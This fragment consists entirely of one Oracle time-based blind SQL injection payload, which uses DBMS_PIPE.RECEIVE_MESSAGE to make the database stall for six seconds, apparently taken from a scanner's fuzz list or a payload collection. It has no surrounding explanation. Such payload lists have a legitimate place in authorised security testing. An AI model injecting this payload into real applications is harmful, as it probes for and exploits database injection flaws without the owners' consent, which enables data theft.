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555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),6)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